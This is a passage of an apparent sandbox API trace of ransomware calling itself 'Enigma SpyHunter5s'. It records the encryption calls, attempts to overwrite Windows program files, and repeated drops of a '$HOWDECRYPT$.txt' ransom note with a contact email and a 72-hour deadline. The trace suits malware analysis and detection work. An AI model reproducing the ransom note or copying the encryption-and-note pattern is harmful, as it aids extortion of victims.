lpNumberOfBytesWritten=0x25ce818*=0x2ac, lpOverlapped=0x0) returned 1 [0162.238] CloseHandle (hObject=0x178) returned 1 [0162.238] GetProcessHeap () returned 0x2c0000 [0162.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae7b8 | out: hHeap=0x2c0000) returned 1 [0162.238] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7b8 | out: pbBuffer=0x25ce7b8) returned 1 [0162.238] GetProcessHeap () returned 0x2c0000 [0162.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.238] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce7b0*=0x30) returned 1 [0162.239] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.239] GetProcessHeap () returned 0x2c0000 [0162.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.239] GetProcessHeap () returned 0x2c0000 [0162.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb520 | out: hHeap=0x2c0000) returned 1 [0162.239] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7b0 | out: pbBuffer=0x25ce7b0) returned 1 [0162.239] GetProcessHeap () returned 0x2c0000 [0162.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.239] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce7a8*=0x30) returned 1 [0162.239] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.239] GetProcessHeap () returned 0x2c0000 [0162.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.239] GetProcessHeap () returned 0x2c0000 [0162.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2558 | out: hHeap=0x2c0000) returned 1 [0162.239] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.240] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.240] WriteFile (in: hFile=0x178, lpBuffer=0x25ce6e3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce80c, lpOverlapped=0x0 | out: lpBuffer=0x25ce6e3*, lpNumberOfBytesWritten=0x25ce80c*=0x127, lpOverlapped=0x0) returned 1 [0162.248] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.248] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce80c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce80c*=0x2ac, lpOverlapped=0x0) returned 1 [0162.249] CloseHandle (hObject=0x178) returned 1 [0162.249] GetProcessHeap () returned 0x2c0000 [0162.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e079e8 | out: hHeap=0x2c0000) returned 1 [0162.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7a8 | out: pbBuffer=0x25ce7a8) returned 1 [0162.249] GetProcessHeap () returned 0x2c0000 [0162.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce7a0*=0x30) returned 1 [0162.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sidebar.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.249] GetProcessHeap () returned 0x2c0000 [0162.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.249] GetProcessHeap () returned 0x2c0000 [0162.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07918 | out: hHeap=0x2c0000) returned 1 [0162.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7a8 | out: pbBuffer=0x25ce7a8) returned 1 [0162.249] GetProcessHeap () returned 0x2c0000 [0162.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce7a0*=0x30) returned 1 [0162.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sbdrop.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.250] GetProcessHeap () returned 0x2c0000 [0162.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.250] GetProcessHeap () returned 0x2c0000 [0162.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84998 | out: hHeap=0x2c0000) returned 1 [0162.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7a0 | out: pbBuffer=0x25ce7a0) returned 1 [0162.250] GetProcessHeap () returned 0x2c0000 [0162.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce798*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce798*=0x30) returned 1 [0162.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\baptist shipping indicate.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\baptist shipping indicate.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.250] GetProcessHeap () returned 0x2c0000 [0162.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.250] GetProcessHeap () returned 0x2c0000 [0162.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2478 | out: hHeap=0x2c0000) returned 1 [0162.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows portable devices\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.251] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.251] WriteFile (in: hFile=0x178, lpBuffer=0x25ce6d3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce7fc, lpOverlapped=0x0 | out: lpBuffer=0x25ce6d3*, lpNumberOfBytesWritten=0x25ce7fc*=0x127, lpOverlapped=0x0) returned 1 [0162.252] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.252] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce7fc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce7fc*=0x2ac, lpOverlapped=0x0) returned 1 [0162.252] CloseHandle (hObject=0x178) returned 1 [0162.252] GetProcessHeap () returned 0x2c0000 [0162.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7ef48 | out: hHeap=0x2c0000) returned 1 [0162.252] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce798 | out: pbBuffer=0x25ce798) returned 1 [0162.252] GetProcessHeap () returned 0x2c0000 [0162.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.253] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce790*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce790*=0x30) returned 1 [0162.253] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll" (normalized: "c:\\program files (x86)\\windows portable devices\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.253] GetProcessHeap () returned 0x2c0000 [0162.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.253] GetProcessHeap () returned 0x2c0000 [0162.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c848d0 | out: hHeap=0x2c0000) returned 1 [0162.253] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows photo viewer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.254] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.254] WriteFile (in: hFile=0x178, lpBuffer=0x25ce6cb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce7f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce6cb*, lpNumberOfBytesWritten=0x25ce7f4*=0x127, lpOverlapped=0x0) returned 1 [0162.255] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.255] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce7f4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce7f4*=0x2ac, lpOverlapped=0x0) returned 1 [0162.255] CloseHandle (hObject=0x178) returned 1 [0162.255] GetProcessHeap () returned 0x2c0000 [0162.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07848 | out: hHeap=0x2c0000) returned 1 [0162.255] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce790 | out: pbBuffer=0x25ce790) returned 1 [0162.255] GetProcessHeap () returned 0x2c0000 [0162.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.255] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce788*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce788*=0x30) returned 1 [0162.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.262] GetProcessHeap () returned 0x2c0000 [0162.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.262] GetProcessHeap () returned 0x2c0000 [0162.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84808 | out: hHeap=0x2c0000) returned 1 [0162.262] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce790 | out: pbBuffer=0x25ce790) returned 1 [0162.262] GetProcessHeap () returned 0x2c0000 [0162.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.262] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce788*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce788*=0x30) returned 1 [0162.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.267] GetProcessHeap () returned 0x2c0000 [0162.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.267] GetProcessHeap () returned 0x2c0000 [0162.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7ed98 | out: hHeap=0x2c0000) returned 1 [0162.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce788 | out: pbBuffer=0x25ce788) returned 1 [0162.267] GetProcessHeap () returned 0x2c0000 [0162.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce780*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce780*=0x30) returned 1 [0162.268] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceyi.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.273] GetProcessHeap () returned 0x2c0000 [0162.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.273] GetProcessHeap () returned 0x2c0000 [0162.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eebce8 | out: hHeap=0x2c0000) returned 1 [0162.273] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce788 | out: pbBuffer=0x25ce788) returned 1 [0162.273] GetProcessHeap () returned 0x2c0000 [0162.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce780*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce780*=0x30) returned 1 [0162.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.279] GetProcessHeap () returned 0x2c0000 [0162.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.279] GetProcessHeap () returned 0x2c0000 [0162.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaaf50 | out: hHeap=0x2c0000) returned 1 [0162.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.280] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.280] WriteFile (in: hFile=0x178, lpBuffer=0x25ce6b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce7e0, lpOverlapped=0x0 | out: lpBuffer=0x25ce6b7*, lpNumberOfBytesWritten=0x25ce7e0*=0x127, lpOverlapped=0x0) returned 1 [0162.281] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.281] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce7e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce7e0*=0x2ac, lpOverlapped=0x0) returned 1 [0162.281] CloseHandle (hObject=0x178) returned 1 [0162.281] GetProcessHeap () returned 0x2c0000 [0162.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e075d8 | out: hHeap=0x2c0000) returned 1 [0162.281] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce780 | out: pbBuffer=0x25ce780) returned 1 [0162.281] GetProcessHeap () returned 0x2c0000 [0162.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.281] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce778*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce778*=0x30) returned 1 [0162.281] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpadfilter.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.283] GetProcessHeap () returned 0x2c0000 [0162.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.283] GetProcessHeap () returned 0x2c0000 [0162.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07508 | out: hHeap=0x2c0000) returned 1 [0162.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.284] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.284] WriteFile (in: hFile=0x178, lpBuffer=0x25ce6af*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce7d8, lpOverlapped=0x0 | out: lpBuffer=0x25ce6af*, lpNumberOfBytesWritten=0x25ce7d8*=0x127, lpOverlapped=0x0) returned 1 [0162.285] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.285] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce7d8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce7d8*=0x2ac, lpOverlapped=0x0) returned 1 [0162.285] CloseHandle (hObject=0x178) returned 1 [0162.285] GetProcessHeap () returned 0x2c0000 [0162.285] HeapFree (in: 